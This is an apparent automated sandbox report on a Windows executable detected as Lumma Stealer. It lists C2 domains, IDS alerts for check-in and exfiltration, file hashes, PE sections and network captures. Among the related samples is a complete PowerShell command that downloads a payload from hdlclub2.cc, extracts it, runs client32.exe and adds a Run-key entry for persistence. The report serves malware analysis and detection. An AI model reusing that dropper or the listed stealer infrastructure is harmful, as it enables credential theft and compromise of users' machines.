                                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://necklacedmny.store/apiZfile.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmptrue
                                                              unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://necklacedmny.store/?19file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  unknown
                                                                  https://necklacedmny.store/G11file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    unknown
                                                                    https://necklacedmny.store/api0file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://necklacedmny.store/apisnfile.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        unknown
Legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP: 188.114.96.3
Domain: necklacedmny.store
Country: European Union
ASN: 13335
ASN Name: CLOUDFLARENETUS
Malicious: true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545111
Start date and time: 2024-10-30 06:15:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@5/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
• Execution Graph export aborted for target file.exe, PID 6136 because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time: 01:15:58
Type: API Interceptor
Description: 10x Sleep call for process: file.exe modified
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 188.114.96.3
• 0JLWNg4Sz1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 977255cm.nyashkoon.in/secureWindows.php
• zxalphamn.doc | malicious | Lokibot | touxzw.ir/alpha2/five/fre.php
• QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/jI82Ms6K/download
• 9D7RwuJrth.exe | malicious | DCRat, PureLog Stealer, zgRAT | 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
• DBUfLVzZhf.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
• R5AREmpD4S.exe | malicious | JohnWalkerTexasLoader | xilloolli.com/api.php?status=1&wallets=0&av=1
• 7950COPY.exe | malicious | FormBook | www.globaltrend.xyz/b2h2/
• transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | paste.ee/d/Gitmx
• 19387759999PO-RFQ-INVOICE-doc.exe | malicious | FormBook | www.zonguldakescortg.xyz/483l/
• PO 4800040256.exe | malicious | FormBook | www.rtpngk.xyz/876i/
Associated Sample Name / URL | Detection | Threat Name | Context

Match: necklacedmny.store
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
• file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.97.3
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
• file.exe | malicious | LummaC | 188.114.96.3
• file.exe | malicious | LummaC | 188.114.97.3
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
• file.exe | malicious | LummaC | 188.114.97.3
• file.exe | malicious | LummaC | 188.114.96.3
• file.exe | malicious | LummaC, Amadey, LummaC Stealer | 188.114.96.3

Match: fp2e7a.wpc.phicdn.net
• https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM= | malicious | HTMLPhisher | 192.229.221.95
• https://alcatrazpackages.com/elchapo.html | malicious | Unknown | 192.229.221.95
• https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cv | malicious | Unknown | 192.229.221.95
• https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0N | malicious | Unknown | 192.229.221.95
• https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vresU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWA | malicious | Unknown | 192.229.221.95
• http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD; | malicious | Unknown | 192.229.221.95
• https://frs1sctxxr.shop/1stSource | malicious | Unknown | 192.229.221.95
• https://www.directo.com.bo/dok | malicious | Unknown | 192.229.221.95
• file.exe | malicious | Credential Flusher | 192.229.221.95
• ORDER-241029-44789AC.vbs | malicious | Unknown | 192.229.221.95
Associated Sample Name / URL | Detection | Threat Name | Context

Match: CLOUDFLARENETUS
• Statement JULY #U007e SEP 2024 USD 19,055.00.exe | malicious | AgentTesla | 172.67.74.152
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
• 0JLWNg4Sz1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188.114.96.3
• XhYAqi0wi5.exe | malicious | Stealc | 172.67.179.207
• file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.97.3
• Purchase_Order_pdf.exe | malicious | FormBook | 188.114.97.3
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.97.3
• file.exe | malicious | Stealc, Vidar | 172.64.41.3
• z1MRforsteamDRUM-A1_pdf.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
• https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5 | malicious | Unknown | 172.67.132.160
Associated Sample Name / URL | Detection | Threat Name | Context

Match: a0e9f5d64349fb13191bc781f81f42e1
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
• file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 188.114.96.3
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
• file.exe | malicious | LummaC | 188.114.96.3
• file.exe | malicious | LummaC | 188.114.96.3
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
• file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 188.114.96.3
• file.exe | malicious | LummaC | 188.114.96.3
• file.exe | malicious | LummaC | 188.114.96.3
• file.exe | malicious | LummaC | 188.114.96.3
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.538064351181556
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:file.exe
                                                                        File size:2'975'744 bytes
                                                                        MD5:263307cbc603bef82f9365cc2fd70b46
                                                                        SHA1:7b6eda920d7b71d23befdaca8a40362c8aadd4cf
                                                                        SHA256:5db93dc71e9af5cd5df48dc571a0f7d08430bdcec03292a88928436ae0c75708
                                                                        SHA512:6b6db6307568d7009a457fc5d8a40a70abee6570fb11cd715cb537e0733b24b68a55e2e67dff6221ee0990f7bdc22789ff4572dc35c0540b17bc07613a48d68a
                                                                        SSDEEP:49152:zBbV1o75LBL8F04a/P3+WlBVyRlvq2CRwinLKri:lb3WNBL8q4aXlBwRlvMLMi
                                                                        TLSH:60D52A62E50972DBE44E27B4A92FCD42996D07F5073505C3AC69F4BB7E63CC112BAC28
                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........p0...........@...........................0......|-...@.................................T...h..
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x707000
                                                                        Entrypoint Section:.taggant
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                        Instruction
                                                                        jmp 00007F4668EB526Ah
                                                                        cmovbe ebp, dword ptr [00000000h]
                                                                        add cl, ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x59000 | 0x340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x58000 | 0x27e00 | 0f5988916bca55384bab29e40a414261 | False | 0.9981938185736677 | data | 7.985188315102083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x340 | 0x400 | 914cd139a383496d0085d499d138ef92 | False | 0.390625 | data | 4.997389973748798 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
syfhwmyd | 0x5b000 | 0x2ab000 | 0x2aae00 | ba51a52a14ab6a3384dff8d9c31608dc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vfrwkpsf | 0x306000 | 0x1000 | 0x400 | 037b8397edf45c8d6af1ad0ecfb54a27 | False | 0.7734375 | data | 6.057096526179851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x307000 | 0x3000 | 0x2200 | b6df059bc8cfe30ef1630703fa9b1998 | False | 0.07295496323529412 | DOS executable (COM) | 0.7030721830436618 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x59058 | 0x2e6 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.45417789757412397
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T06:15:59.318552+0100 | 2057131 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) | 1 | 192.168.2.5 | 63113 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.541033+0100 | 2057129 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) | 1 | 192.168.2.5 | 63250 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.573155+0100 | 2057127 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) | 1 | 192.168.2.5 | 57736 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.584908+0100 | 2057125 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) | 1 | 192.168.2.5 | 59597 | 1.1.1.1 | 53 | UDP
2024-10-30T06:15:59.596182+0100 | 2057123 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) | 1 | 192.168.2.5 | 52480 | 1.1.1.1 | 53 | UDP
2024-10-30T06:16:00.238748+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:01.272406+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:01.272406+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:01.952542+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:02.433640+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:02.433640+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:03.419365+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:04.820527+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:05.357470+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:06.125733+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:07.654384+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:09.165357+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP
2024-10-30T06:16:11.282563+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Oct 30, 2024 06:16:07.655587912 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.655612946 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.656064987 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:07.657164097 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.657258987 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:07.657270908 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.088340998 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.088455915 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.088524103 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.088629007 CET49709443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.088671923 CET44349709188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.555221081 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.555262089 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:08.555334091 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.555608988 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:08.555624008 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.165268898 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.165357113 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.166656017 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.166666031 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.166909933 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.168113947 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.168766975 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.168800116 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.168889999 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.168924093 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169012070 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169049978 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169161081 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169183969 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169297934 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169327021 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169440031 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169464111 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169471025 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169492960 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169589043 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169615984 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169635057 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169646978 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.169739962 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169763088 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.169783115 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.174591064 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.174719095 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.174753904 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:09.174771070 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.174793005 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:09.185291052 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.961822033 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.961941004 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.961996078 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.962069988 CET49710443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.962089062 CET44349710188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.998959064 CET49711443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.999033928 CET44349711188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:10.999125957 CET49711443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.999411106 CET49711443192.168.2.5188.114.96.3
                                                                        Oct 30, 2024 06:16:10.999444008 CET44349711188.114.96.3192.168.2.5
                                                                        Oct 30, 2024 06:16:11.282562971 CET49711443192.168.2.5188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 06:15:59.318552017 CET | 63113 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 06:15:59.536302090 CET | 53 | 63113 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 06:15:59.541033030 CET | 63250 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 06:15:59.550151110 CET | 53 | 63250 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 06:15:59.573154926 CET | 57736 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 06:15:59.582647085 CET | 53 | 57736 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 06:15:59.584908009 CET | 59597 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 06:15:59.593558073 CET | 53 | 59597 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 06:15:59.596182108 CET | 52480 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 06:15:59.612287045 CET | 53 | 52480 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 06:15:59.318552017 CET | 192.168.2.5 | 1.1.1.1 | 0xbd8f | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
